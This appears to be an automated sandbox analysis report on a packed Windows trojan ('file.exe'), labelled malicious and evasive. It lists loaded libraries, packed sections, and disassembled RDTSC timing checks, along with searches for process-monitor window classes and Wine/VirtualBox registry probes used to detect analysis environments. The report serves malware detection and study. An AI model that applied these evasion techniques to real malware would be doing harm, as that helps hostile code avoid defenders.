              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CB2DE70_2_00CB2DE7
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B9658D0_2_00B9658D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CB65420_2_00CB6542
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3F7920_2_00D3F792
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CB7F7C0_2_00CB7F7C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B9876E0_2_00B9876E
              Source: C:\Users\user\Desktop\file.exeCode function: String function: 00904A60 appears 316 times
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: file.exeStatic PE information: Section: kzyuzjct ZLIB complexity 0.9946100634305682
              Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00923A50 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00923A50
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091CAE0 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_0091CAE0
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\K9VMR0XV.htmJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: file.exeReversingLabs: Detection: 39%
              Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
              Source: file.exeStatic file information: File size 1790976 > 1048576
              Source: file.exeStatic PE information: Raw size of kzyuzjct is bigger than: 0x100000 < 0x19b600

              Data Obfuscation

              barindex
              Detected unpacking (changes PE section rights)
              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.900000.0.unpack :EW;.rsrc:W;.idata :W; :EW;kzyuzjct:EW;xpspqxsm:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;kzyuzjct:EW;xpspqxsm:EW;.taggant:EW;
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00926390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00926390
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: file.exeStatic PE information: real checksum: 0x1b6206 should be: 0x1c3cde
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: kzyuzjct
              Source: file.exeStatic PE information: section name: xpspqxsm
              Source: file.exeStatic PE information: section name: .taggant
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00927895 push ecx; ret 0_2_009278A8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B9C8A1 push eax; mov dword ptr [esp], esi0_2_00B9C8FD
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B9C8A1 push ebp; mov dword ptr [esp], 60BEB7C1h0_2_00B9C951
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B9C8A1 push ebp; mov dword ptr [esp], ecx0_2_00B9C981
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B9C8A1 push eax; mov dword ptr [esp], 00000004h0_2_00B9C985
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B9C8A1 push 41145D59h; mov dword ptr [esp], ebp0_2_00B9C9C6
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B9C8A1 push edx; mov dword ptr [esp], 5FB7BC13h0_2_00B9CA1E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B9C8A1 push edx; mov dword ptr [esp], esi0_2_00B9CAC3
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DB28C0 push esi; mov dword ptr [esp], 66BD43C2h0_2_00DB28F1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DB28C0 push eax; mov dword ptr [esp], ebx0_2_00DB29A9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D600E8 push eax; mov dword ptr [esp], ecx0_2_00D60128
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B4F0E7 push ebp; mov dword ptr [esp], 7F49734Ah0_2_00B4F0EB
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D67085 push edi; mov dword ptr [esp], ecx0_2_00D670CF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CDA8A8 push 238A2370h; mov dword ptr [esp], edx0_2_00CDBE88
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D34850 push 149993DFh; mov dword ptr [esp], edx0_2_00D3489E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D4A862 push 3515D69Dh; mov dword ptr [esp], ecx0_2_00D4A8D6
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D4A862 push ecx; mov dword ptr [esp], esi0_2_00D4A8EA
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B6E80E push 56105C41h; mov dword ptr [esp], ecx0_2_00B6E85F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B6E80E push 0A1FD1FEh; mov dword ptr [esp], edx0_2_00B6E87B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3506F push 51BA7F47h; mov dword ptr [esp], ebx0_2_00D350AB
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3506F push edx; mov dword ptr [esp], eax0_2_00D35106
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D71823 push 3FEC32C8h; mov dword ptr [esp], ebx0_2_00D71847
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CF8039 push ecx; mov dword ptr [esp], ebx0_2_00CF8115
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CD7833 push ebx; mov dword ptr [esp], eax0_2_00CD886C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CD7833 push 50C6E005h; mov dword ptr [esp], ebx0_2_00CD887B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CD7833 push 7391CBC9h; mov dword ptr [esp], eax0_2_00CD9461
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D349C8 push 629B2E61h; mov dword ptr [esp], esi0_2_00D349F5
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D349C8 push 661FBD8Ah; mov dword ptr [esp], eax0_2_00D34A2B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CEB9EF push esi; mov dword ptr [esp], edx0_2_00CEBA0F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C881F5 push 3F010A5Ch; mov dword ptr [esp], ebx0_2_00C882B5
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C881F5 push ebp; mov dword ptr [esp], eax0_2_00C882B9
              Source: file.exeStatic PE information: section name: kzyuzjct entropy: 7.953368185260934

              Boot Survival

              barindex
              Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00926390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00926390

              Malware Analysis System Evasion

              barindex
              Found evasive API chain (may stop execution after checking locale)
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-25857
              Tries to detect sandboxes / dynamic malware analysis system (registry check)
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Tries to detect virtualization through RDTSC time measurements
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B50215 second address: B50219 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B50219 second address: B5021D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5021D second address: B5024B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F11A0C2C898h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 js 00007F11A0C2C886h 0x0000001a pop eax 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5024B second address: B50251 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B50251 second address: B4FA43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov dword ptr [ebp+122D27BCh], ebx 0x0000000f push dword ptr [ebp+122D1019h] 0x00000015 sub dword ptr [ebp+122D24B9h], edi 0x0000001b call dword ptr [ebp+122D23ABh] 0x00000021 pushad 0x00000022 mov dword ptr [ebp+122D2452h], edi 0x00000028 xor eax, eax 0x0000002a clc 0x0000002b mov edx, dword ptr [esp+28h] 0x0000002f mov dword ptr [ebp+122D2452h], ecx 0x00000035 mov dword ptr [ebp+122D395Dh], eax 0x0000003b sub dword ptr [ebp+122D1838h], esi 0x00000041 mov dword ptr [ebp+122D1838h], ebx 0x00000047 mov esi, 0000003Ch 0x0000004c pushad 0x0000004d add dword ptr [ebp+122D1838h], esi 0x00000053 popad 0x00000054 xor dword ptr [ebp+122D2452h], edi 0x0000005a add esi, dword ptr [esp+24h] 0x0000005e pushad 0x0000005f adc di, 8B14h 0x00000064 or bh, 00000017h 0x00000067 popad 0x00000068 mov dword ptr [ebp+122D1838h], ecx 0x0000006e lodsw 0x00000070 add dword ptr [ebp+122D1838h], edi 0x00000076 clc 0x00000077 add eax, dword ptr [esp+24h] 0x0000007b pushad 0x0000007c mov esi, dword ptr [ebp+122D374Dh] 0x00000082 mov dword ptr [ebp+122D19F6h], eax 0x00000088 popad 0x00000089 mov ebx, dword ptr [esp+24h] 0x0000008d jmp 00007F11A0C2C895h 0x00000092 push eax 0x00000093 push eax 0x00000094 push edx 0x00000095 jnc 00007F11A0C2C888h 0x0000009b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC8913 second address: CC891D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC891D second address: CC8959 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F11A0C2C88Ah 0x0000000c pushad 0x0000000d popad 0x0000000e push esi 0x0000000f pop esi 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 jmp 00007F11A0C2C899h 0x00000019 pop eax 0x0000001a jne 00007F11A0C2C88Eh 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC8A85 second address: CC8A99 instructions: 0x00000000 rdtsc 0x00000002 je 00007F11A0CA9286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jng 00007F11A0CA928Ah 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC8D7A second address: CC8D7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC8EE4 second address: CC8EF5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F11A0CA928Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC8EF5 second address: CC8EFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC9058 second address: CC905D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC905D second address: CC9069 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F11A0C2C886h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC91B4 second address: CC91BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC91BC second address: CC91C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC91C2 second address: CC91CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F11A0CA9286h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC91CE second address: CC91D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC91D7 second address: CC91DD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCBEDB second address: B4FA43 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 41E7C838h 0x0000000f xor esi, 6210E34Eh 0x00000015 push dword ptr [ebp+122D1019h] 0x0000001b mov dword ptr [ebp+122D1828h], ecx 0x00000021 mov dh, bh 0x00000023 call dword ptr [ebp+122D23ABh] 0x00000029 pushad 0x0000002a mov dword ptr [ebp+122D2452h], edi 0x00000030 xor eax, eax 0x00000032 clc 0x00000033 mov edx, dword ptr [esp+28h] 0x00000037 mov dword ptr [ebp+122D2452h], ecx 0x0000003d mov dword ptr [ebp+122D395Dh], eax 0x00000043 sub dword ptr [ebp+122D1838h], esi 0x00000049 mov dword ptr [ebp+122D1838h], ebx 0x0000004f mov esi, 0000003Ch 0x00000054 pushad 0x00000055 add dword ptr [ebp+122D1838h], esi 0x0000005b popad 0x0000005c xor dword ptr [ebp+122D2452h], edi 0x00000062 add esi, dword ptr [esp+24h] 0x00000066 pushad 0x00000067 adc di, 8B14h 0x0000006c or bh, 00000017h 0x0000006f popad 0x00000070 mov dword ptr [ebp+122D1838h], ecx 0x00000076 lodsw 0x00000078 add dword ptr [ebp+122D1838h], edi 0x0000007e clc 0x0000007f add eax, dword ptr [esp+24h] 0x00000083 pushad 0x00000084 mov esi, dword ptr [ebp+122D374Dh] 0x0000008a mov dword ptr [ebp+122D19F6h], eax 0x00000090 popad 0x00000091 mov ebx, dword ptr [esp+24h] 0x00000095 jmp 00007F11A0C2C895h 0x0000009a push eax 0x0000009b push eax 0x0000009c push edx 0x0000009d jnc 00007F11A0C2C888h 0x000000a3 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCBF1B second address: CCBF21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCBF21 second address: CCBF25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCC024 second address: CCC038 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11A0CA9290h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCC038 second address: CCC04B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F11A0C2C88Fh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCC04B second address: CCC04F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCC04F second address: CCC091 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 5B1F3903h 0x0000000f push 00000000h 0x00000011 push ebp 0x00000012 call 00007F11A0C2C888h 0x00000017 pop ebp 0x00000018 mov dword ptr [esp+04h], ebp 0x0000001c add dword ptr [esp+04h], 00000017h 0x00000024 inc ebp 0x00000025 push ebp 0x00000026 ret 0x00000027 pop ebp 0x00000028 ret 0x00000029 mov esi, dword ptr [ebp+122D2815h] 0x0000002f lea ebx, dword ptr [ebp+1244FDD5h] 0x00000035 mov di, ax 0x00000038 push eax 0x00000039 pushad 0x0000003a push edi 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCC091 second address: CCC0A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F11A0CA928Ah 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCC17A second address: CCC17F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCC17F second address: CCC184 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCC184 second address: CCC18A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCC18A second address: CCC20E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F11A0CA9297h 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 jmp 00007F11A0CA9293h 0x00000016 mov eax, dword ptr [eax] 0x00000018 jmp 00007F11A0CA928Eh 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 jg 00007F11A0CA928Eh 0x00000027 pop eax 0x00000028 xor si, 286Dh 0x0000002d lea ebx, dword ptr [ebp+1244FDDEh] 0x00000033 jmp 00007F11A0CA928Fh 0x00000038 mov cl, 2Dh 0x0000003a push eax 0x0000003b je 00007F11A0CA9294h 0x00000041 push eax 0x00000042 push edx 0x00000043 jnp 00007F11A0CA9286h 0x00000049 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCC36B second address: CCC372 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEB5DE second address: CEB5E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEB5E6 second address: CEB61A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F11A0C2C88Ah 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F11A0C2C891h 0x00000013 jmp 00007F11A0C2C890h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEB61A second address: CEB624 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F11A0CA9286h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEB624 second address: CEB638 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F11A0C2C88Ch 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEB766 second address: CEB782 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F11A0CA9298h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEB782 second address: CEB793 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 js 00007F11A0C2C886h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEB793 second address: CEB7AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F11A0CA928Dh 0x0000000c jl 00007F11A0CA9286h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEB7AD second address: CEB7B7 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F11A0C2C886h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEBA51 second address: CEBA58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEBDF0 second address: CEBE07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F11A0C2C891h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEC0EE second address: CEC104 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 pushad 0x00000007 push eax 0x00000008 pushad 0x00000009 popad 0x0000000a pop eax 0x0000000b jp 00007F11A0CA9288h 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE13FA second address: CE13FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBCBEB second address: CBCC07 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11A0CA9294h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEC6C3 second address: CEC6D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F11A0C2C88Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEC6D1 second address: CEC6D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEC6D9 second address: CEC6DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEC6DD second address: CEC703 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11A0CA928Bh 0x00000007 jno 00007F11A0CA9286h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 jo 00007F11A0CA9296h 0x00000016 push eax 0x00000017 push edx 0x00000018 jg 00007F11A0CA9286h 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CECCE7 second address: CECCF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F11A0C2C886h 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
